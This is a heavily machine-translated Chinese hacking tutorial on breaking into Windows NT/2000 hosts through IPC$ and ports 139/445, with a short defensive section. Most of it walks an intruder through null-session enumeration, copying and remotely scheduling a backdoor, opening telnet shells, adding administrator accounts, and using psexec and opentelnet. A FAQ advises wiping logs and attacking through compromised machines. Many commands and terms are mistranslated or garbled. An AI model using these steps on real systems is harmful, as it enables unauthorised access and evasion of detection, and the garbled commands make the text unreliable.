445端口入侵原因的详细分析

注释：445端口入侵。在那之前，我们首先要看到的是为什么445个港口会成为一个被入侵的港口。445端口是IPC服务的默认端口。

445端口入侵详细说明

关于445端口入侵内容

445端口入侵详细说明

本站搜索更多关于445端口入侵的信息；

445个港口入侵了，在那之前，我们为什么要明白为什么445个港口是入侵的港口

445端口是IPC服务的默认端口。

IPC$

综述

有无数的IPC$对互联网的入侵，甚至攻击步骤已经成为一种固化的模式，因此没有人愿意把这变成了事物的常态了。但不得不说的是，我认为这些文章没有详细解释，有些内容甚至是错误的，即IPC$这个问题几乎占了各大安全论坛讨论的半壁江山，而这些问题往往是重复的，对学习论坛的质量和效率，严重的影响，所以我总结了本文的IPC$，希望能够让这部分的事情要说。

注：本文所讨论的各种情况均默认为Win NT / 2000环境和Win98将不在此讨论。

二是什么是IPC

IPC$（Internet连接过程）是一个共享资源命名管道，它是为了让进程间通信和开放的命名管道，通过提供可信任的用户名称和密码，双方可以建立安全的通道，通道进行加密数据的交换，从而实现对远程计算机的访问。IPC$是NT / 2000的新功能，它有一个特点，在同一时间，只有一个连接两个IP允许。NT / 2000提供的功能同时开放IPC$共享安装的第一时间，系统即默认情况下，所有的逻辑共享（C $ D $，E $ hellip，&hellip）和系统目录WinNT或Windows（ADMIN$）分享。所有这些，微软的初衷是便于管理的管理掌握，但在意识或无意，从而降低系统的安全性。

在平时，我们总能听到有人谈论IPC漏洞，IPC漏洞。事实上，IPC并不是真正的脆弱感。我想之所以有人这么说是微软自己的，后门：空会话（空会话）。那么什么是空会话

三什么是空洞的谈话

在引入空会话之前，我们必须了解如何构建安全会话。

在Windows NT 4中，我们使用质询响应协议与远程机器建立会话。一个成功的会议将成为一个安全的隧道，双方可以相互建立信息。

1）会话请求者（客户）将数据包发送给会话接收方（服务器），请求建立安全隧道。

2）服务器生成一个随机的64位数字（实现挑战）发送给客户；

3）客户获得64位数由服务器产生的，将它与该帐户的密码，试图建立会话，并将结果返回给服务器（实现响应）。

4）服务器发送到本地安全验证的响应（LSA）收到响应后，LSA验证请求者的身份，利用用户的正确密码验证响应。如果请求者的帐号是服务器的本地帐户，验证局部发生；如果请求的帐户域帐户，将响应发送到域控制器验证。当对挑战的响应被证明是正确的，一个访问令牌生成并发送给客户。客户使用这个访问令牌连接到资源服务器上的会话终止之前推荐。

以上是建立安全会话的一般过程，那么空会话呢

在会话的情况下缺乏信任空会话的建立和服务器（即不提供用户名和密码），但根据WIN2000的访问控制模型，空会话还需要提供一个令牌，但在建立一个空会话过程无需用户认证信息，因此用户不包含信息。这个令牌在这个环节不能让加密信息发送系统，但这并不意味着标识符不包含一个空会话令牌的安全（确定用户和组），一个免费的会话，LSA的SID的1-5-7提供一个令牌，这是一个会话。用户名：匿名登录（用户名是可以在用户列表中，但不是在山姆发现数据库系统属于内置帐户），访问令牌包含组的伪装下：

每个人都

网络

在安全策略的限制下，这个空会话将被授权访问上面两组有权访问的所有信息。

四个空洞的谈话能做什么

NT，默认的安全设置，空连接可以对目标主机和用户共享访问权限的共享上市，大家访问注册表的一小部分，并没有什么太大的利用价值；对2000更小，因为在Windows 2000的默认只有管理员和备份操作员版本有权从网络访问注册表，也不方便，不需使用工具。

由此我们看到非信任会话并没有多大用处，但从完整的IPC入侵，空会话是一个不可或缺的跳板，因为我们可以从中得到一个用户列表，而大多数弱密码扫描工具就是使用这个列表向用户猜测密码。导出用户列表成功大大提高了猜测的成功率，仅从这一点上，说明了空会话带来的安全风险，使得空会话无用参数不正确：

1首先，我们首先设置一个空会话（当然，这需要一个开放的IPC）。

命令：NET使用

注意：上面的命令包括四个空格，在使用和使用之间有一个空格，一个在后面使用，一个在密码周围。

2视图远程主机共享资源

命令：网络视图

解释：前提是在建立空连接之后，我们可以使用这个命令看到远程主机的共享资源。如果它打开了共享，我们可以得到以下结果，但是这个命令不能显示默认共享。

在资源共享中。

资源共享名称类型使用注释

-----------------------------------------------------------

暂停登录服务器共享磁盘

SYSVOL共享磁盘登录服务器

命令已成功完成。

3查看远程主机的当前时间

命令：网络时间

解释：远程主机的当前时间可以通过此命令获得。

4得到一个远程主机的NetBIOS用户名列表（你需要打开自己的NBT）

命令：请一个IP

使用这个命令，你可以得到一个远程主机的NetBIOS用户名列表返回以下结果：

节点IP地址：范围编号：{ *。*。*。* } { }

远程计算机的NetBIOS名称表

名称类型状态

---------------------------------------------

独特的注册服务器

oyamanishi-h集团注册

oyamanishi-h集团注册

独特的注册服务器

oyamanishi-h独特的注册

oyamanishi-h集团注册

独特的注册服务器

oyamanishi-h独特的注册

__msbrowse__ ..。集团注册

该~服务集团注册

是~服务器…独特的注册

MAC地址= 00-50-8b - 9 2d-37

以上就是我们经常做的空对话。看来，我们可以得到很多东西，但我们注意到，建立IPC$连接的操作会在事件日志中留下记录，不管你是否登录successfully.ok，现在让我们看看在IPC$端口被使用

五端口使用五

首先，我们将了解一些基本知识。

1 smbserver消息块）Windows文件打印共享服务协议族；

2 nbtnetbios TCP / IP）采用137（UDP）138（UDP）端口139（TCP）来实现网络互连的基于TCP / IP协议。

3、在WindowsNT，SMB实现NBT，即使用139端口（TCP）。在Windows2000环境下，中小企业可以直接实现通过445端口除了NBT。

通过这些基础知识，我们可以进一步讨论端口接入网络共享的选择。

在win2000客户端（引发剂）：

1如果连接服务器的NBT允许客户端也将尝试访问139和445端口445端口，如果有响应，然后发送一个RST包给139端口断开，使455端口445端口时的谈话，没有回应，只有139个端口，如果两端口没有响应，接着谈话失败；

2、如果NBT连接到服务器，然后客户端将试图访问445端口。如果445端口没有响应，则会话失败。

在Win2000服务器端：

1如果NBT是允许的，那么UDP端口137, 138，端口139, 445将开放（听）；

2如果NBT是禁止的，只有445端口是开放的。

我们为端口所建立的IPC会话的选择也遵循上述原则。显然，如果远程服务器不监视139个或445个端口，则无法建立IPC会话。

六IPC管道在黑客攻击中的意义

IPC管道最初是由微软设计的，方便管理员远程管理，但在入侵者看来，IPC管道的主机更容易获得，通过IPC管道，我们可以通过工具远程调用一些系统功能，但具有相应的权限。这往往是成功或失败的入侵的关键。如果你不考虑这些，只从一方面的文件传输，IPC管道给入侵者极大的支持，甚至已经成为最主要的传播途径，所以你总是可以看到一些朋友在各大论坛的目标机打开IPC管道和挫败呼救。当然，我们不能忽视在IPC管道机构的重要作用。想必你一定经历过空洞谈话的尴尬。我们没有开放管道的权限，但是一旦入侵者拥有管理员的权限，IPC管道就是一把双刃剑，它将显示其凶猛的一面。

七个IPC连接失败的七个常见原因

以下是IPC连接失败的常见原因：

1 IPC Windows NT连接是唯一的，超过了系统的功能，因为需要在许多DLL函数中使用Windows NT，所以不能在Windows 9×L／L系统中运行，也就是说，只有NT／2000／XP可以建立相互IPC连接，而98／I IPC连接不能建立；

2，如果要成功地构建一个IPC连接，则需要由应答者打开IPC共享。即使是空的连接也是一样的。如果应答器关闭IPC $共享，则连接将不被建立。

3、连接剂开始没有lanmanworkstation服务（显示名称是工作站）：它提供网络连接和通信，并没有引发剂可以发起连接请求没有它。

4方未能启动lanmanserver服务响应（显示名称：服务器），它提供RPC支持、文件、打印以及命名管道共享，ipc$依赖于此服务，也不会没有主机响应连接请求的发出者，但不能启动IPC$连接；

5响应方未启动NetLogon，支持计算机通过登录身份通过网络上的（但这似乎不多）。

6响应方的139445端口不处于监视状态或被防火墙屏蔽；

7连接启动程序不打开139445端口；

8，用户名或密码错误：如果出现这样的错误，系统会给您一个错误，如无法更新密码。

9命令输入错误：可能有更多或更少的空间。当用户名和密码不包含空格时，两边的双引号可以省略。如果密码是空的，可以直接输入两个引号。

10如果伙伴重启计算机时，一个很好的连接已经建立，IPC$连接将自动断开和重新建立连接。

此外，还可以根据返回的错误号来分析原因：

错误号5，拒绝访问：很可能您使用的用户不是管理员权限；

错误号51，Windows找不到网络路径：网络有问题；

错误号53，无法找到网络路径：ip地址错误；目标不启动；目标lanmanserver服务没有启动；目标有防火墙（端口过滤）。

错误号67，找不到网络名：你的lanmanworkstation服务没有启动或目标删除IPC$；

错误1219，所提供的凭据与现有凭证集冲突：您已与另一个建立了一个IPC，请删除重新连接；

错误数字1326，未知的用户名或错误的密码：原因是显而易见的；

错误号1792，试图登录，但是网络登录服务没有启动：目标NetLogon服务未启动；

错误号2242。用户的密码已过期：目标有帐户策略，并且需要定期更改密码。

文件副本失败的八个原因

虽然有些朋友已经成功地建立了IPC连接，但在复制时，他们遇到了这样的麻烦，他们无法成功地复制。复制失败的常见原因是什么

1对方未打开共享文件夹

这种类型的错误最多，占50%以上，许多朋友在成功建立IPC连接之前不知道对方是否共享文件夹。他们无法复制失败。因此，我建议在你的副本，你必须使用NetView IP是否看到共享文件夹，你想复制的存在。最好是使用软件来查看它，在构建IPC连接时不要认为有共享文件夹。

2到默认共享复制失败

这种错误通常是由每个人造成的，主要有两个方面：

1）错误的想法是，能够建立IPC连接的主机必须打开默认共享。因此，在建立连接之后，它会将文件复制到C $、D $、admin $等等。一旦对方不打开默认共享，将导致复制失败，IPC$连接成功只能说明对方打开IPC$共享，这并不表明默认共享会存在。IPC$共享和默认共享是不同的，IPC$共享是一个命名管道，并不是实际的文件夹，而默认共享真的是一个共享文件夹；

2）由于净观 IP这个命令显示默认的共享文件夹（因为美元）共享的默认值，因此通过这个命令，我们不能确定对方是否打开默认共享，因此如果对方未开启默认共享，那么所有的默认共享操作不成功；但大多数（扫描软件扫描弱口令的同时，可以扫到默认共享目录，可以避免的错误）

关键点：请务必区分IPC默认共享、共享、共享三者之间的一个共同点：IPC共享是一个管道，而共享文件夹是不实用的；默认共享是默认打开文件夹安装的；普通共享是我们自己开放的可以共享的文件夹设置权限。

3个用户权限不够，包括四个用户权限：

1）当一个空的连接被复制到所有共享（默认共享和普通共享）时，权限是不够的；

2）共享复制默认，在Win2000 Pro版本，只有管理员和备份操作员组的成员可以访问Win2000 Server版本服务器operatros组这些共享目录。

3）当复制到普通共享时，必须拥有适当的权限（也就是其他管理员设置的权限）；

4）另一方可以通过设置防火墙或安全软件禁止外部访问共享；

小心 uff1a

1不要认为管理员必须拥有管理员权限，管理员的名称可以更改。

2管理员可以通过默认访问共享文件夹，但不能访问普通的共享文件夹，因为管理员可以对普通的共享文件夹的权限，如图6所示，为D盘设置为只允许访问的文件夹命名为Xinxin用户完全访问权限的管理员，即使你拥有管理员权限，你仍然不能访问D盘。但有趣的是，如果对方开始默认共享D美元，那么你可以访问D美元，从而绕过了权限限制，感兴趣的朋友可以自己做测试。

4被防火墙或局域网杀死

还有一种情况就是也许你的复制操作已经成功，但当远程操作，是在一个防火墙杀了，找不到文件；或者你把木马复制到局域网内的主机，导致连接失败（反向连接木马不会发生）。如果你不想这样的情况，你会觉得这是复制的问题，但实际上你的复制操作已成功，但有一个问题，在运行时。

哦，你知道的，IPC连接在实际操作过程中会有各种各样的问题，我刚才总结了一些常见的错误，不说，你可以给我一个说明。

九关于AT命令和XP对IPC的限制

我想说的是，你用在由于远程操作程序失败，但考虑到成功率是不是很高，很多问题，这里就不提（它提供了更多的，随着越来越多的人），但我们推荐使用psexec.exe远程操作的程序，如果你想要一个远程机器执行本地C： xinxin.exe文件，并为管理员，密码是1234，然后输入下面的命令：

Psexec IP -u管理员P 1234 C： xinxin.exe

如果IPC连接已经建立，两参数U P是不需要的，和psexec.exe会自动将文件复制到远程机器上运行。

起初，XP中的IPC不想在这里讨论，并且想单独讨论它。但我看到越来越多的朋友问为什么大部分操作都很难成功，当他们遇到XP很着急。在这里，我将简单地提到它，在XP中默认的安全选项，任何远程访问权限只给客人，所以即使你是用管理员帐户和密码，你得到许可，唯一的客人，所以大部分的操作将失败，因为权限不足，到目前为止并没有打破这个限制的一个好方法。所以如果你真的得到了XP的管理员密码，我建议你尽量避免IPC管。

十如何打开IPC共享和其他共享目标

目标IPC不容易打开，否则会破坏整个世界。您需要一个管理员特权shell，如telnet、特洛伊木马、CMD重定向等等，然后在shell下执行：

净分享IPC

开放目标共享；

NET共享IPC

关闭目标的IPC $共享；如果你想为它打开一个共享文件夹，你可以使用它：

NET共享

所以把它作为C文件夹的共享名称打开。（但我发现很多人错误地认为打开共享文件夹命令是网络共享C $，也以一种炫耀的方式向新手点，这是误导）。

十一一些命令需要shell完成

很多教程都是以非常不准确的方式编写的。有些命令要求shell完成命令，该命令只在IPC连接下实现，这是误导性的：

1将用户设置到远程主机，激活用户，修改用户密码，并且管理组的操作应该在shell下完成。

2打开远程主机的IPC共享，共享默认值，并且共享共享操作需要在shell下完成；

3运行/关闭远程主机的服务需要在shell下完成；

4 start / kill the remote host process, and also need to be done under shell (with the exception of software, such as pskill).

十二个可用于入侵的命令

在本教程的完整性中，我列出了IPC中一些常用的命令。如果您已经掌握了这些命令，可以跳过此部分并查看以下内容。请注意，这些命令适用于本地或远程。如果您只适用于本地区域，那么当您获取远程主机的shell时，只能执行远程主机，如CMD、telnet等。

1建立/删除IPC连接命令

1）建立一个空连接：

NET使用 127.0.0.1 IPC$ /用户：

2）建立非空连接：

NET使用 127.0.0.1 IPC$密码/用户：用户名

3）删除连接：

NET使用 127.0.0.1 IPC$ /删除

IPC连接中远程主机的2个操作命令

1）查看远程主机的共享资源（不是默认共享）：

净观 127.0.0.1

2）查看远程主机的当前时间：

净时间 127.0.0.1

3）得到一个远程主机的NetBIOS用户名列表：

NBTSTAT - 127.0.0.1

4）映射/删除远程共享：

使用Z： 127.0.0.1 C

该命令将共享资源名为C映射到本地z磁盘。

NET使用

删除映射的z磁盘，以及其他磁盘模拟

5）将文件复制到远程主机：

复制路径文件名共享目录名，例如：

复制C： xinxin.exe 127.0.0.1 C $ C复制xinxin.exe对方在C

当然，您也可以将文件从远程主机复制到自己的机器上。

复制 127.0.0.1 C $ xinxin.exe C：

6）远程添加计划任务：

在IP时间程序名称为：

在 127.0.0.0 11:00 xinxin.exe

注：时间尝试使用24小时制。如果你计划在系统默认的搜索路径运行程序（如system32 /），不添加路径，否则你必须添加完整路径。

3本地命令

1）查看本地主机的共享资源（您可以看到本地默认共享）

网络共享

2）获取本地主机的用户列表。

网络用户

3）显示本地用户的帐户信息。

NET用户帐户名

4）显示本地主机当前正在启动的服务。

启动

5）启动/关闭本地服务

网络启动服务名称

停止服务名称

6）在本地添加帐户

NET用户帐户名称密码

7）激活禁用用户

网络用户帐户名称/主动：是的

8）加入管理组

net localgroup administrators帐户名称 /添加

显然，尽管这些都是本地命令，如果您在远程主机的shell中输入，例如，如果您成功地输入了上述命令，则这些本地输入将在远程主机telnet上工作。

4其他命令

1）Telnet

telnet ip端口

Telnet 127.0.0.0 23

2）与opentelnet.exe打开远程主机的telnet

opentelnet.exe IP的管理员帐户密码NTLM身份验证模式下的港口

opentelnet.exe 127.0.0.1管理员190

但是这个小工具需要满足四个要求：

1）目标打开IPC共享

2）您必须拥有管理员的密码和帐号。

3）当目标打开远程注册表操作的服务，用户可以更改NTLM身份验证

4）有效期只有WIN2K或XP

3）获得psexec.exe步壳，需要IPC管道支撑

psexec.exe IP -你的管理员帐户密码cmd - P

psexec.exe 127.0.0.1 U管理员P cmd

十三对比IPC入侵过去和现在

既然是对比，那么我会先把过去的IPC入侵步骤写给大家，这是一个相当经典的步骤：

{ 1 }

C： >网使用 127.0.0.1 IPC$ /用户：admintitrators

通过对空订单连接的扫描

{ 2 }

C：净观 127.0.0.1

检查资源的远程共享

{ 3 }

C：复制srv.exe 127.0.0.1 管理$ System32

单拷贝srv.exe到后门，其他系统文件夹ADMIN$的前提下开放

{ 4 }

C：净时间 127.0.0.1

查看远程主机的当前时间

{ 5 }

C： >在 127.0.0.1时间srv.exe

使用AT指令srv.exe 遥控操作，需要彼此打开the'task scheduler'service

{ 6 }

C：净时间 127.0.0.1

再次观判断srv.exe已经运行的当前时间，这一步可以省略

{ 7 }

C：telnet 127.0.0.1 99

打开一个新窗口Telnet远程登录到127.0.0.1去壳壳（不知道是什么然后你把它作为一个远程计算机控制，操作如DOS），而99端口是端口一个后门打开srv.exe。

{ 8 }

C：中 System32 >启动Telnet服务

毕竟启动远程机器的telnet我们刚刚降落在服务的壳，srv.exe是一次性的后门，我们后面需要访问一个长的后门，如果telnet对方已经启动，这一步可以省略

{ 9 }

C：复制ntlm.exe 127.0.0.1 管理$ System32

在窗口 ntlm.exe通过，ntlm.exe是用来改变验证

{ 10 }

C： System32 > ntlm.exe WinNT

在shell窗口中运行ntlm.exe，然后你就可以顺利登录该主机。

{ 11 }

C：telnet 127.0.0.1 23

在一个新窗口telnet 127.0.0.1，端口23可以省略，所以我们有一个很长的后门

{ 12 }

C： System32 >网中的用户帐户名密码 /添加

C： System32 >网用户中，客人/主动：是的

C：系统 System32 > net localgroup administrators帐户名称 /添加

在telnet之后，您可以创建一个新帐户，激活来宾，向管理组添加任何帐户，等等。

好吧，我在这里写的似乎是回到2, 3年前，当IPC每个人都这么被使用，但是随着新工具的出现，上面提到的工具和命令都不习惯，现在让我们看看高效而简单的IPC入侵。

{ 1 }

psexec.exe IP -你的管理员帐户密码cmd - P

有了这个工具，我们可以步进shell。

opentelnet.exe 服务器的管理员帐户密码NTLM身份验证模式下的港口

为了验证该方法，它可以用来改变telnet端口，方便、方便我们登陆。

{ 2 }

第二步，一步获取壳后，你能做什么，你可以使用winshell安全门，克隆与Ca、与3389.vbe打开终端，与win2kpass记录密码，许多的好工具，任你选择，我就不多说了。

十四如何防范IPC入侵

1禁止空连接枚举（此操作不阻止建立空连接）

运行注册表编辑器，找到下面的键{ hkey_local_machine 系统 CurrentControlSet 控制 LSA }改变restrictanonymous = DWORD的键值：1

如果设置为1，建议设置为1。如果上述密钥不存在，则将生成一个新的键值。如果您感到麻烦可以更改注册表，则在本地安全设置中：在本地安全设置-本地策略中，对附加选项的安全选项进行匿名连接。

2禁止违约共享

1）查看本地共享资源

运行-输入网络共享

2）删除共享（重新启动默认共享后仍然存在）

NET共享IPC

NET共享管理

NET共享

网络共享D $ /删除（如果E，F，可以继续删除）

3）停止服务器服务

NET停止服务器（重启后服务器服务将重新开放）

4）禁止自动打开默认共享（此操作不关闭IPC $共享）

运行注册表编辑器

服务器版本：发现以下关键{ hkey_local_machine 系统 CurrentControlSet 服务 lanmanserver 参数}，改变autoshareserver键值（DWORD）00000000。

专业版：发现以下关键{ hkey_local_machine 系统 CurrentControlSet 服务 lanmanserver 参数}，改变autosharewks键值（DWORD）00000000。

默认情况下，主机上不存在这两个键值。它们需要手动添加，修改机器并使设置生效。

3用于关闭IPC和默认共享依赖项的服务：服务器服务

如果确实要关闭IPC共享，请停止服务器服务。

控制面板-管理工具-服务-找到服务器服务（右键单击）-属性-一般-选择启动类型被禁用，那么可能有建议：XXX服务也将关闭继续，因为有第二个服务取决于服务器服务，不管理它。

4屏蔽139445端口

由于不支持上述两个端口，所以不可能构建IPC，因此屏蔽139445个端口也可以防止IPC入侵。

1）139端口可以屏蔽禁止NBT

本地连接的TCP /属性-高级-胜-选择'禁用netbios；TCP /它

2）445端口可以通过修改注册表来屏蔽。

添加一个键值

蜂巢：hkey_local_machine

Key: SystemControlsetServicesNetBTParameters

名称：smbdeviceenabled

类型：reg_dword

价值：0

修改后重新启动机器

注意：如果上述两个端口被屏蔽，你就不能用IPC入侵其他人。

3）为端口过滤安装防火墙

6，设置复杂的密码并通过IPC防止密码耗尽，我认为这是提高安全意识的最好方法，它比连续修补更安全。

十五入侵问题答案选择

上面说的理论很多，但在实践中，你会遇到各种各样的问题，所以为了给你最大的帮助，我在主要的安全论坛上整理了一些有代表性的问题，其中一些是我给出的回答，有的是论坛的回复，如果有什么疑问可以来找我讨论。

1。当IPC入侵时，服务器将在服务器中留下记录。有什么办法让服务器找到它吗

答：肯定会留下一个记录。在你离开之后，你可以用清洁程序删除它或者用肉鸡入侵。

2。你看下面的情况是为什么，可以连接但不能复制。

NET中的应用程序。

命令成功

复制icmd.exe ***。***。***。*** ADMIN$

找不到网络路径

命令失败

答：像找不到网络路径；找不到网络名等问题，主要是因为你要复制的共享文件夹没有打开，所以在复制时会有错误，你可以试着找到其他共享文件夹。

3、如果对方打开IPC $，并且可以建立空连接，但在打开C和D盘时，都需要密码。我知道空连接没有太多的许可，但是还有其他方法吗

答：建议使用流光或其他扫描软件来猜测密码，如果猜不到，只能放弃，毕竟空连接的能力是有限的。

4。我已经猜到了管理员的密码，IPC连接已经成功了，但是NET视图发现它没有共享默认值，我该怎么办呢

答：首先纠正你一个错误，与净观 IP无法看到默认共享，您可以尝试将文件复制到C $ D $看，如果没有，他关闭了默认共享，那么你可以使用opentelnet.exe或psexec.exe，使用上述。

成功完成了5。IPC连接后，我用下面的命令构建了一个帐户，但是我在自己的机器上找到了这个帐户。怎么了

网络用户ccbirds /添加

答：IPC成功地建立了，只有你与远程主机建立通信通道，并不意味着你已经做了shell，只有在获得shell（如telnet）之后，你才能在远程机器上建立一个帐户，否则你就只能在本地操作了。

6。我有一台肉类机，有管理员帐号，可以看他的时间，但他的机器不能复制程序，每次拒绝访问，都被复制了0个文件，而对方是不是没有打开什么服务，我该怎么办

答：一般是拒绝访问权限；不够，你可以使用账户的问题，还有一种可能是，如果你想共享的文件夹拷贝文件到普通但返回此错误，文件夹设置允许访问用户中不包括你（即使你是管理员）这一点，我在最后一批。

7。我可以用Win98建立与其他一个IPC$连接

答：从理论上讲，不可能进行IPC的操作。建议使用WIN2000，和其他操作系统会带来许多不必要的麻烦。

8。我成功地用NET

答：空会话可以在默认的情况下用户列表的出口，但如果通过修改注册表来禁止出口名单的管理员，会有你所说的话；有可能是你自己的NBT不开放，netstat命令是建立在NBT，U3000 U3000

9。当我建立IPC$连接，我返回以下信息：&lsquo；提供的凭据与现有的凭据集的冲突，有什么事吗

答：哦，这表明您已经建立了与目标主机的IPC连接，并且两个主机不允许同时构建两个IPC $连接。

10。我映射的时候出现了。

F： >网使用H： 211.161.134。* E美元

系统中出现85个错误。

本地设备名在使用中，怎么回事

答：你太粗心了，这意味着你有一个H盘，没有映射到字母！

11、我成功地建立了一个连接，即：123用户成功，但当我正在映射时，出现了一个错误，为我索要密码，发生了什么事

f：NET使用h。

密码无效。

请键入密码：

系统中出现5个错误。

拒绝访问。

回答：嗯，我想问你一个密码，说明你目前没有足够的用户权限。您不能映射C的默认共享，试图提高权限或找到管理员的弱密码。默认共享通常由管理员要求。

12。我用superscan扫开了139端口的主机，但为什么你不能把它空着

答：你混淆了IPC $和139之间的关系。可以连接IPC的主机将打开139个或445个端口，但是打开这两个端口的主机可能无法连接空，因为另一方可以关闭IPC共享。

13、我们局域网的大部分机器都是XP。我使用流光扫描几个管理员帐户。密码是空的，可以连接，但它不能复制的东西，说错误5。对不起，为什么

答：XP的安全性较高，在默认安全策略配置中，验证本地网络登录帐户的时间，默认为来宾权限，即使您使用远程管理员登录，只有来宾权限，因此您复制该文件，当然是错误的：5权限不足。

14。我成功的净使用 192.168.0.2 IPC$密码或用户：管理员

请键入 192.168.0.2的密码。你怎么回去的我用它当经理吗我应该参观些什么

答：虽然你有管理员权限，但管理员在设置C共享权限时（注意：普通共享可以设置访问权限，而默认不共享）可能不设置允许管理员访问，所以会有问题。

15。如果您自己的机器禁止IPC $，是否有可能将其他计算机与IPC连接起来如果禁止服务器服务怎么办

答：禁止以上两项还可以启动IPC连接，但这样的问题会更好。

16。你能告诉我下面两个错误的原因吗

c：NET时间61.225。

系统中出现5个错误。

拒绝访问。

图61.225

系统中出现5个错误。

拒绝访问。

答：当我第一次遇到这个问题的时候，我也很困惑。错误5表示权限不够，但即使是空会话的特权也可以完成上面的两条命令。他为什么不能那样做呢他没有建立连接吗后来，那个粗心大意的同志告诉我他干了。他忘了他已经删除了IPC连接。然后他进入上面的两个命令，然后出现了错误5。

17。你怎么了

f：NET时间

找不到时间服务器。

请键入net helpmsg 3912更多的帮助。

答：答案很简单，您的订单是错的，应该是网络时间

没有输入IP地址，当然也找不到服务器。视图的命令也应该有一个IP地址，也就是说，net